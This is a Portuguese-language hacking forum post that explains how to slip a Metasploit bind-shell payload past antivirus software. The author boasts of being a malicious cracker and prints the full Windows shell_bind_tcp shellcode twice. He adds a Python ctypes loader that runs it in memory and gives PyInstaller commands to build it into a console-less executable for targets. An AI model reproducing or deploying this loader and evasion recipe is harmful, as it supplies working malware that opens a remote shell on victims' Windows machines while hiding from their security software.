Unconfigured Ad Widget

Collapse

Anúncio

Collapse
No announcement yet.

Bypass AntiVirus with Python and Metasploit

Collapse
X
 
  • Filter
  • Tempo
  • Show
Clear All
new posts

  • Font Size
    #1

    Dica Bypass AntiVirus with Python and Metasploit

    Isso não é um tutorial, nem receita de bolo nem porra nenhuma, vc n vai aprender aqui passo a passo como se faz, nem vou explicar detalhadamente nada. Espero que vc tenha um mínimo de conhecimento nas áreas envolvidas nesse medíocre texto, podendo usufruir de todo o seu poder malígno (no meu caso é malígno porque sou um cracker ta ligado? sou mlk do mal). Enfim, tire suas conclusões acerca disso e baseie-se para criar novas técnicas.
    e.g: tudo foi criado em um kali linux e as "vítimas" foram um w7 e um ws2008, só para constar.

    [+] ------------------------------ EXU666 ------------------------------[+]

    Comecei abrindo meu MSF e gerei um payload simples (ah dwango pq vc setou o shell_bind_tcp e não o reverse tcp? pq eu quis fazer esse tutorial com o bind tcp maldito, existem diferenças entre eles mas não importa agr, só tô demonstrando uma técnica de evasion aqui e não um livro sobre metasploit)

    msfpayload windows/shell_bind_tcp X > dwango.exe
    Dps vc confere se criou o arquivo né, pode ter dado alguma exception

    ls -l dwango.exe
    Pronto seu backconnect tá criado e pode mandar pra sua windows machine. Obviamente o anti-virus vai detectar e se pá o firewall também pq os padrões de encode do msf tão manjado já... Vamos ao q interessa negadis (isso q te falei acima serviu de nd, só pra mostrar q os bypass do msf são infuncionais lol riarairiaa )

    P.S: O código original do bind é ->
    Código:
    # windows/shell_bind_tcp - 341 bytes
    # http://www.metasploit.com
    # VERBOSE=false, LPORT=4444, RHOST=, EXITFUNC=process, 
    # InitialAutoRunScript=, AutoRunScript=
    buf = 
    "\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52" +
    "\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26" +
    "\x31\xff\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d" +
    "\x01\xc7\xe2\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0" +
    "\x8b\x40\x78\x85\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b" +
    "\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff" +
    "\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4\x03\x7d" +
    "\xf8\x3b\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3\x66\x8b" +
    "\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44" +
    "\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b" +
    "\x12\xeb\x86\x5d\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f" +
    "\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8\x90\x01\x00\x00\x29" +
    "\xc4\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x50\x50\x50\x50" +
    "\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0\xff\xd5\x89\xc7\x31" +
    "\xdb\x53\x68\x02\x00\x11\x5c\x89\xe6\x6a\x10\x56\x57\x68" +
    "\xc2\xdb\x37\x67\xff\xd5\x53\x57\x68\xb7\xe9\x38\xff\xff" +
    "\xd5\x53\x53\x57\x68\x74\xec\x3b\xe1\xff\xd5\x57\x89\xc7" +
    "\x68\x75\x6e\x4d\x61\xff\xd5\x68\x63\x6d\x64\x00\x89\xe3" +
    "\x57\x57\x57\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66\xc7\x44" +
    "\x24\x3c\x01\x01\x8d\x44\x24\x10\xc6\x00\x44\x54\x50\x56" +
    "\x56\x56\x46\x56\x4e\x56\x56\x53\x56\x68\x79\xcc\x3f\x86" +
    "\xff\xd5\x89\xe0\x4e\x56\x46\xff\x30\x68\x08\x87\x1d\x60" +
    "\xff\xd5\xbb\xf0\xb5\xa2\x56\x68\xa6\x95\xbd\x9d\xff\xd5" +
    "\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f" +
    "\x6a\x00\x53\xff\xd5"
    [+] ------------------------------ EXU666 ------------------------------[+]

    msfpayload windows/shell_bind_tcp C > shell.py
    Vc acabou de gerar o payload(ainda detected) em python, vamos modifica-lo para q fique FUD e q seu ataque lammer seja um sucesso!

    Código:
    from ctypes import *
    shellcode = ("\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52" +
    "\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26" +
    "\x31\xff\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d" +
    "\x01\xc7\xe2\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0" +
    "\x8b\x40\x78\x85\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b" +
    "\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff" +
    "\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4\x03\x7d" +
    "\xf8\x3b\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3\x66\x8b" +
    "\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44" +
    "\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b" +
    "\x12\xeb\x86\x5d\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f" +
    "\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8\x90\x01\x00\x00\x29" +
    "\xc4\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x50\x50\x50\x50" +
    "\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0\xff\xd5\x89\xc7\x31" +
    "\xdb\x53\x68\x02\x00\x11\x5c\x89\xe6\x6a\x10\x56\x57\x68" +
    "\xc2\xdb\x37\x67\xff\xd5\x53\x57\x68\xb7\xe9\x38\xff\xff" +
    "\xd5\x53\x53\x57\x68\x74\xec\x3b\xe1\xff\xd5\x57\x89\xc7" +
    "\x68\x75\x6e\x4d\x61\xff\xd5\x68\x63\x6d\x64\x00\x89\xe3" +
    "\x57\x57\x57\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66\xc7\x44" +
    "\x24\x3c\x01\x01\x8d\x44\x24\x10\xc6\x00\x44\x54\x50\x56" +
    "\x56\x56\x46\x56\x4e\x56\x56\x53\x56\x68\x79\xcc\x3f\x86" +
    "\xff\xd5\x89\xe0\x4e\x56\x46\xff\x30\x68\x08\x87\x1d\x60" +
    "\xff\xd5\xbb\xf0\xb5\xa2\x56\x68\xa6\x95\xbd\x9d\xff\xd5" +
    "\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f" +
    "\x6a\x00\x53\xff\xd5");
    memorywithshell = create_string_buffer(shellcode, len(shellcode))
    shell = cast(memorywithshell, CFUNCTYPE(c_void_p))
    
    shell()
    Is that bro! Ah, lembrando q foi usado o python 2.7 e vou te falar os softwares pra vc conveter pra EXE e sua respectiva build:

    PyWin32 build 218 (Vc acha no sourceforge, só configurar)
    pip-Win (Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...)

    Depois de instalado o pip-Win, vc vai na command box e põe:
    venv -c -i pyi-env-name
    Isso será necessário para a instalação do PyInstaller. Well, vai abrir um CMD no seu ruindozão, só basta digitar:
    pip install PyInstaller
    Tá de boa, verifica a versão do PyInstaller com um "--version". Se der 2.1, tá ok. Depois compila o "shell.py" que fizemos ali em cima, vou deixar o comando pra poupar vcs de irem na documentação (se chegarem a ir né)

    pyinstaller --onefile --noconsole shell.py
    e.g2: não tive o intuito de deixar organizado, se não entendeu simplesmente se retire desse post pois ñ é para seu nível hj to numa rage loka

    fonts -> samsclass n softwares documentations

    Happy Hacking
    Last edited by dwango; 27-04-2014, 21:42.
    Similar Threads
X
Working...
X